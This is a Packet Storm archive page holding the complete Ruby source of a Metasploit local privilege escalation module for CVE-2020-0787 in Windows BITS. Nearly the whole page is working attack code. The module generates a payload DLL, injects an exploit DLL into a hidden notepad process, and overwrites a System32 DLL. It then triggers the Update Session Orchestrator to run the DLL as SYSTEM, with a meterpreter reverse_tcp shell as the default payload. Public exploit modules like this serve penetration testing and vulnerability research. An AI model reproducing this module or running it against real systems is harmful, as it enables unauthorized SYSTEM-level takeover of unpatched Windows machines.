what you don't know can hurt you

Background Intelligent Transfer Service Privilege Escalation

Background Intelligent Transfer Service Privilege Escalation
Posted Jun 11, 2020
Authored by itm4n, gwillcox-r7 | Site metasploit.com

This Metasploit module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the Background Intelligent Transfer Service (BITS), to overwrite C:\Windows\System32\WindowsCoreDeviceInfo.dll with a malicious DLL containing the attacker's payload. To achieve code execution as the SYSTEM user, the Update Session Orchestrator service is then started, which will result in the malicious WindowsCoreDeviceInfo.dll being run with SYSTEM privileges due to a DLL hijacking issue within the Update Session Orchestrator Service. Note that presently this module only works on Windows 10 and Windows Server 2016 and later as the Update Session Orchestrator Service was only introduced in Windows 10. Note that only Windows 10 has been tested, so your mileage may vary on Windows Server 2016 and later.

tags | exploit, arbitrary, code execution
systems | windows
advisories | CVE-2020-0787
MD5 | 0804ff3bfe957376a4af71aa3919154f

Background Intelligent Transfer Service Privilege Escalation

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::Windows::Priv
include Msf::Exploit::EXE # Needed for generate_payload_dll
include Msf::Post::Windows::FileSystem
include Msf::Post::Windows::ReflectiveDLLInjection
include Msf::Exploit::FileDropper
include Msf::Post::File
include Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability',
'Description' => %q{
This module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the
Background Intelligent Transfer Service (BITS), to overwrite C:\Windows\System32\WindowsCoreDeviceInfo.dll
with a malicious DLL containing the attacker's payload.

To achieve code execution as the SYSTEM user, the Update Session Orchestrator service is then started, which
will result in the malicious WindowsCoreDeviceInfo.dll being run with SYSTEM privileges due to a DLL hijacking
issue within the Update Session Orchestrator Service.

Note that presently this module only works on Windows 10 and Windows Server 2016 and later as the
Update Session Orchestrator Service was only introduced in Windows 10. Note that only Windows 10 has been tested,
so your mileage may vary on Windows Server 2016 and later.
},
'License' => MSF_LICENSE,
'Author' =>
[
'itm4n', # PoC
'gwillcox-r7' # msf module
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Privileged' => true,
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' =>
[
[ 'Windows DLL Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => '2020-03-10',
'References' =>
[
['CVE', '2020-0787'],
['URL', 'https://itm4n.github.io/cve-2020-0787-windows-bits-eop/'],
['URL', 'https://github.com/itm4n/BitsArbitraryFileMove'],
['URL', 'https://attackerkb.com/assessments/e61cfec0-d766-4e7e-89f7-5aad2460afb8'],
['URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html'],
['URL', 'https://itm4n.github.io/usodllloader-part1/'],
['URL', 'https://itm4n.github.io/usodllloader-part2/'],
],
'Notes' =>
{
'SideEffects' => [ ARTIFACTS_ON_DISK ],
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ CRASH_SAFE ]
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
'WfsDelay' => 900
}
)
)

register_options([
OptBool.new('OVERWRITE_DLL', [true, 'Overwrite WindowsCoreDeviceInfo.dll if it exists (false by default).', false]),
OptInt.new('JOB_WAIT_TIME', [true, 'Time to wait for the BITS job to complete before starting the USO service to execute the uploaded payload, in seconds', 20])
])
end

def target_not_presently_supported
print_warning('This target is not presently supported by this exploit. Support may be added in the future!')
print_warning('Attempts to exploit this target with this module WILL NOT WORK!')
end

def check
sysinfo_value = sysinfo['OS']

if sysinfo_value !~ /windows/i
# Non-Windows systems are definitely not affected.
return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')
end

# XXX Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations.
build_num_raw = session.shell_command_token('cmd.exe /c ver')
build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)
if build_num.nil?
print_error("Couldn't retrieve the target's build number!")
else
build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)[0]
print_status("Target's build number: #{build_num}")
end

# see https://docs.microsoft.com/en-us/windows/release-information/
unless sysinfo_value =~ /(7|8|8\.1|10|2008|2012|2016|2019|1803|1903)/
return CheckCode::Safe('Target is not running a vulnerable version of Windows!')
end

build_num_gemversion = Gem::Version.new(build_num)

# Build numbers taken from https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/
if (build_num_gemversion >= Gem::Version.new('10.0.18363.0')) && (build_num_gemversion < Gem::Version.new('10.0.18363.719')) # Windows 10 v1909
return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')
elsif (build_num_gemversion >= Gem::Version.new('10.0.18362.0')) && (build_num_gemversion < Gem::Version.new('10.0.18362.719')) # Windows 10 v1903
return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')
elsif (build_num_gemversion >= Gem::Version.new('10.0.17763.0')) && (build_num_gemversion < Gem::Version.new('10.0.17763.1098')) # Windows 10 v1809
return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')
elsif (build_num_gemversion >= Gem::Version.new('10.0.17134.0')) && (build_num_gemversion < Gem::Version.new('10.0.17134.1365')) # Windows 10 v1803
return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')
elsif (build_num_gemversion >= Gem::Version.new('10.0.16299.0')) && (build_num_gemversion < Gem::Version.new('10.0.16299.1747')) # Windows 10 v1709
return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')
elsif (build_num_gemversion >= Gem::Version.new('10.0.15063.0')) && (build_num_gemversion < Gem::Version.new('10.0.15063.2313')) # Windows 10 v1703
return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')
elsif (build_num_gemversion >= Gem::Version.new('10.0.14393.0')) && (build_num_gemversion < Gem::Version.new('10.0.14393.3564')) # Windows 10 v1607
return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')
elsif (build_num_gemversion >= Gem::Version.new('10.0.10586.0')) && (build_num_gemversion < Gem::Version.new('10.0.10586.9999999')) # Windows 10 v1511
return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')
elsif (build_num_gemversion >= Gem::Version.new('10.0.10240.0')) && (build_num_gemversion < Gem::Version.new('10.0.10240.18519')) # Windows 10 v1507
return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')
elsif (build_num_gemversion >= Gem::Version.new('6.3.9600.0')) && (build_num_gemversion < Gem::Version.new('6.3.9600.19665')) # Windows 8.1/Windows Server 2012 R2
target_not_presently_supported
return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')
elsif (build_num_gemversion >= Gem::Version.new('6.2.9200.0')) && (build_num_gemversion < Gem::Version.new('6.2.9200.23009')) # Windows 8/Windows Server 2012
target_not_presently_supported
return CheckCode::AppearsAppears('Vulnerable Windows 8/Windows Server 2012 build detected!')
elsif (build_num_gemversion >= Gem::Version.new('6.1.7600.0')) && (build_num_gemversion < Gem::Version.new('6.1.7601.24549')) # Windows 7/Windows Server 2008 R2
target_not_presently_supported
return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')
elsif (build_num_gemversion >= Gem::Version.new('6.0.6001.0')) && (build_num_gemversion < Gem::Version.new('6.0.6003.20749')) # Windows Server 2008/Windows Server 2008 SP2
target_not_presently_supported
return CheckCode::Appears('Windows Server 2008/Windows Server 2008 SP2 build detected!')
else
return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')
end
end

def check_target_is_running_supported_windows_version
if sysinfo['OS'].match('Windows').nil?
fail_with(Failure::NotVulnerable, 'Target is not running Windows!')
elsif sysinfo['OS'].match('Windows 10').nil? && sysinfo['OS'].match('Windows Server 2016').nil? && sysinfo['OS'].match('Windows Server 2019').nil?
fail_with(Failure::BadConfig, 'Target is running Windows, its not a version this module supports! Bailing...')
end
end

def check_target_and_payload_match_and_supported(client_arch)
if (client_arch != ARCH_X64) && (client_arch != ARCH_X86)
fail_with(Failure::BadConfig, 'This exploit currently only supports x86 and x64 targets!')
end
payload_arch = payload.arch.first # TODO: Add missing documentation for payload.arch, @wvu used this first but it is not documented anywhere.
if (payload_arch != ARCH_X64) && (payload_arch != ARCH_X86)
fail_with(Failure::BadConfig, "Unsupported payload architecture (#{payload_arch})") # Unsupported architecture, so return an error.
end
if ((client_arch == ARCH_X64) && (payload_arch != ARCH_X64)) || ((client_arch == ARCH_X86) && (payload_arch != ARCH_X86))
fail_with(Failure::BadConfig, "Payload architecture (#{payload_arch}) doesn't match the architecture of the target (#{client_arch})!")
end
end

def check_windowscoredeviceinfo_dll_exists_on_target
# Taken from bwatters-r7's cve-2020-0688_service_tracing.rb code.
#
# We are going to overwrite the WindowsCoreDeviceInfo.dll DLL as part of our exploit.
# The second part of this exploit will trigger a Update Session to be created so that this DLL
# is loaded, which will result in arbitrary code execution as SYSTEM.
#
# To prevent any errors, we will first check that this file doesn't exist and ask the user if they are sure
# that they want to overwrite the file.
win_dir = session.sys.config.getenv('windir')
normal_target_payload_pathname = "#{win_dir}\\System32\\WindowsCoreDeviceInfo.dll"
wow64_target_payload_pathname = "#{win_dir}\\Sysnative\\WindowsCoreDeviceInfo.dll"
wow64_existing_file = "#{win_dir}\\Sysnative\\win32k.sys"
if file?(wow64_existing_file)
if file?(wow64_target_payload_pathname)
print_warning("#{wow64_target_payload_pathname} already exists")
print_warning('If it is in use, the overwrite will fail')
unless datastore['OVERWRITE_DLL']
print_error('Change OVERWRITE_DLL option to true if you would like to proceed.')
fail_with(Failure::BadConfig, "#{wow64_target_payload_pathname} already exists and OVERWRITE_DLL option is false")
end
end
target_payload_pathname = wow64_target_payload_pathname
elsif file?(normal_target_payload_pathname)
print_warning("#{normal_target_payload_pathname} already exists")
print_warning('If it is in use, the overwrite will fail')
unless datastore['OVERWRITE_DLL']
print_error('Change OVERWRITE_DLL option to true if you would like to proceed.')
fail_with(Failure::BadConfig, "#{normal_target_payload_pathname} already exists and OVERWRITE_DLL option is false")
end
target_payload_pathname = normal_target_payload_pathname
end
target_payload_pathname
end

def launch_background_injectable_notepad
print_status('Launching notepad to host the exploit...')
notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
process
rescue Rex::Post::Meterpreter::RequestError
# Sandboxes could not allow to create a new process
# stdapi_sys_process_execute: Operation failed: Access is denied.
print_error('Operation failed. Trying to elevate the current process...')
process = client.sys.process.open
process
end

def exploit
# NOTE: Automatic check is implemented by the AutoCheck mixin
super

# Step 1: Check target environment is correct.
print_status('Step #1: Checking target environment...')
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
client_arch = sysinfo['Architecture']
check_target_is_running_supported_windows_version
check_target_and_payload_match_and_supported(client_arch)
check_windowscoredeviceinfo_dll_exists_on_target

# Step 2: Generate the malicious DLL and upload it to a temp location.
print_status('Step #2: Generating the malicious DLL...')
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787')
datastore['EXE::Path'] = path
if client_arch =~ /x86/i
datastore['EXE::Template'] = ::File.join(path, 'template_x86_windows.dll')
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787', 'CVE-2020-0787.x86.dll')
library_path = ::File.expand_path(library_path)
elsif client_arch =~ /x64/i
datastore['EXE::Template'] = ::File.join(path, 'template_x64_windows.dll')
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787', 'CVE-2020-0787.x64.dll')
library_path = ::File.expand_path(library_path)
end

payload_dll = generate_payload_dll
print_status("Payload DLL is #{payload_dll.length} bytes long")
temp_directory = session.sys.config.getenv('%TEMP%')
malicious_dll_location = "#{temp_directory}\\" + Rex::Text.rand_text_alpha(6..13) + '.dll'
write_file(malicious_dll_location, payload_dll)
register_file_for_cleanup(malicious_dll_location)

# Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy.
print_status('Step #3: Loading the exploit DLL to run the main exploit...')
process = launch_background_injectable_notepad

print_status("Injecting DLL into #{process.pid}...")
exploit_mem, offset = inject_dll_into_process(process, library_path)

dll_info_parameter = malicious_dll_location.to_s
payload_mem = inject_into_process(process, dll_info_parameter)

# invoke the exploit, passing in the address of the payload that
# we want invoked on successful exploitation.
print_status('DLL injected. Executing injected DLL...')
process.thread.create(exploit_mem + offset, payload_mem)

print_status("Sleeping for #{datastore['JOB_WAIT_TIME']} seconds to allow the exploit to run...")
sleep datastore['JOB_WAIT_TIME']

register_file_for_cleanup('C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll') # Register this file for cleanup so that if we fail, then the file is cleaned up.
# Normally we can't delete this file though as there will be a SYSTEM service that has a handle to this file.

print_status("Starting the interactive scan job...")
# Step 4: Execute `usoclient StartInteractiveScan` to trigger the payload
# XXX Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations.
session.shell_command_token('usoclient StartInteractiveScan')

print_status("Enjoy the shell!")
end
end
Login or Register to add favorites

File Archive:

October 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    25 Files
  • 2
    Oct 2nd
    13 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    1 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    15 Files
  • 7
    Oct 7th
    15 Files
  • 8
    Oct 8th
    11 Files
  • 9
    Oct 9th
    3 Files
  • 10
    Oct 10th
    1 Files
  • 11
    Oct 11th
    1 Files
  • 12
    Oct 12th
    8 Files
  • 13
    Oct 13th
    12 Files
  • 14
    Oct 14th
    23 Files
  • 15
    Oct 15th
    4 Files
  • 16
    Oct 16th
    13 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    1 Files
  • 19
    Oct 19th
    27 Files
  • 20
    Oct 20th
    41 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close